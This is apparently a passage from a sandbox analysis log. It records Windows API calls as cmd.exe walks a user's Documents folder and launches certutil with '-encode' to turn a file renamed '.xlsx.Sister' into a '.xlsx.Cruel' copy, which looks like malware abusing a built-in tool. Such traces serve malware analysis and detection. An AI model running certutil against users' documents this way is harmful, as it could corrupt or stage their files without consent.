_ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0307.951] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0307.951] GetProcessHeap () returned 0x21ed8c70000 [0307.951] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0307.951] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0307.951] GetProcessHeap () returned 0x21ed8c70000 [0307.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed9980080 [0307.951] FreeEnvironmentStringsA (penv="=") returned 1 [0307.952] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0307.952] GetProcessHeap () returned 0x21ed8c70000 [0307.952] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0307.952] GetEnvironmentStringsW () returned 0x21ed9980080* [0307.952] GetProcessHeap () returned 0x21ed8c70000 [0307.952] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0307.952] FreeEnvironmentStringsA (penv="=") returned 1 [0307.952] GetProcessHeap () returned 0x21ed8c70000 [0307.952] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c957a0) returned 1 [0307.952] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0307.952] ??_V@YAXPEAX@Z () returned 0x1 [0307.953] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="34r863GjrxofmdERZ-U.xlsx.Sister", cAlternateFileName="")) returned 1 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63ae0, Size=0xd4) returned 0x21ed8d2ee80 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2ee80) returned 0xd4 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32920 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32920, Size=0x58) returned 0x21ed8d32920 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32920) returned 0x58 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.953] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32990 [0307.953] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0307.953] GetProcessHeap () returned 0x21ed8c70000 [0307.954] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7cc40 [0307.954] ??_V@YAXPEAX@Z () returned 0x1 [0307.954] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0307.954] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cee0 [0307.954] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0307.954] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0307.955] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0307.955] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe21cd53e, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe21cd53e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cd60 [0307.955] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0307.955] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0307.955] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\34r863GjrxofmdERZ-U.xlsx.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb85ebb0, ftCreationTime.dwHighDateTime=0x1d592c8, ftLastAccessTime.dwLowDateTime=0xdc91b910, ftLastAccessTime.dwHighDateTime=0x1d5ac26, ftLastWriteTime.dwLowDateTime=0xdc91b910, ftLastWriteTime.dwHighDateTime=0x1d5ac26, nFileSizeHigh=0x0, nFileSizeLow=0x791d, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="34r863GjrxofmdERZ-U.xlsx.Sister", cAlternateFileName="34R863~1.SIS")) returned 0x21ed8c7d000 [0307.955] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0307.956] _wcsnicmp (_String1="34R863~1.SIS", _String2="34r863GjrxofmdERZ-U.xlsx.Sister", _MaxCount=0x1f) returned 23 [0307.956] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0307.956] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0307.956] GetProcessHeap () returned 0x21ed8c70000 [0307.956] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c0c0 [0307.956] ??_V@YAXPEAX@Z () returned 0x1 [0307.956] ??_V@YAXPEAX@Z () returned 0x1 [0307.956] GetProcessHeap () returned 0x21ed8c70000 [0307.956] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d32990, Size=0x270) returned 0x21ed8d32990 [0307.956] GetProcessHeap () returned 0x21ed8c70000 [0307.956] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d32990) returned 0x270 [0307.956] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0307.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.957] GetFileType (hFile=0x50) returned 0x2 [0307.957] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.957] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0307.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.957] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0307.964] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0307.964] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0307.964] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0307.964] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0307.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.964] GetFileType (hFile=0x50) returned 0x2 [0307.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.964] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0307.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.965] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0307.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.970] GetFileType (hFile=0x50) returned 0x2 [0307.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.970] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0307.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.970] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d32930*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d32930*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0307.971] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"34r863GjrxofmdERZ-U.xlsx.Sister\" \"34r863GjrxofmdERZ-U.xlsx.Cruel\" ") returned 76 [0307.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.971] GetFileType (hFile=0x50) returned 0x2 [0307.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.971] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0307.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.972] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0307.972] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0307.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.972] GetFileType (hFile=0x50) returned 0x2 [0307.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.972] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0307.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.973] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0307.980] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0307.980] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0307.980] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0307.980] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0307.980] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0307.981] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0307.981] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0307.981] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0307.981] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0307.981] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0307.981] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0307.981] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0307.981] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0307.981] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0307.981] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0307.981] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0307.981] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0307.981] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0307.981] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0307.981] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0307.981] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0307.981] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0307.982] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0307.982] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0307.982] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0307.982] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0307.982] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0307.982] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0307.982] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0307.982] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0307.982] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0307.982] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0307.982] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0307.982] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0307.982] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0307.982] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0307.982] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0307.982] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0307.982] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0307.982] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0307.983] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0307.983] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0307.983] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0307.983] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0307.983] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0307.983] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0307.983] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0307.983] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0307.983] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0307.983] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0307.983] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0307.983] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0307.983] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0307.983] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0307.983] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0307.983] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0307.983] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0307.983] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0307.983] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0307.983] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0307.983] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0307.983] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0307.983] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0307.984] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0307.984] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0307.984] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0307.984] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0307.984] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0307.984] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0307.984] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0307.984] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0307.984] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0307.984] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0307.984] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0307.984] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0307.984] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0307.984] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0307.984] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0307.984] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0307.984] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0307.984] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0307.984] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0307.984] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0307.984] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0307.984] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0307.984] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0307.984] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0307.984] ??_V@YAXPEAX@Z () returned 0x1 [0307.985] GetProcessHeap () returned 0x21ed8c70000 [0307.985] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d32c10 [0307.985] GetProcessHeap () returned 0x21ed8c70000 [0307.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed8d6a7c0 [0307.986] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0307.986] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0307.986] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0307.986] GetProcessHeap () returned 0x21ed8c70000 [0307.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9380160 [0307.986] SetErrorMode (uMode=0x0) returned 0x0 [0307.986] SetErrorMode (uMode=0x1) returned 0x0 [0307.986] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9380170, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0xa6cf4fdb80*="Documents") returned 0x19 [0307.986] SetErrorMode (uMode=0x0) returned 0x1 [0307.986] GetProcessHeap () returned 0x21ed8c70000 [0307.986] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9380160, Size=0x56) returned 0x21ed9380160 [0307.986] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9380160) returned 0x56 [0307.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0307.987] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c0) returned 0x21ed8d64c00 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x370) returned 0x21ed8d55f30 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f30, Size=0x1c2) returned 0x21ed8d64860 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64860) returned 0x1c2 [0307.987] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7d160 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x7e) returned 0x21ed8c7d160 [0307.987] GetProcessHeap () returned 0x21ed8c70000 [0307.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x7e [0307.988] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.988] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.988] GetLastError () returned 0x2 [0307.988] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.988] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.991] GetLastError () returned 0x2 [0307.992] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.992] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0307.992] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0307.992] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.992] GetLastError () returned 0x2 [0307.992] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cca0 [0307.996] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0307.996] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0307.996] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0307.996] ??_V@YAXPEAX@Z () returned 0x1 [0307.996] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0307.997] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0307.997] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0307.999] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0307.999] GetProcessHeap () returned 0x21ed8c70000 [0307.999] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45d40 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0307.999] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0308.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", 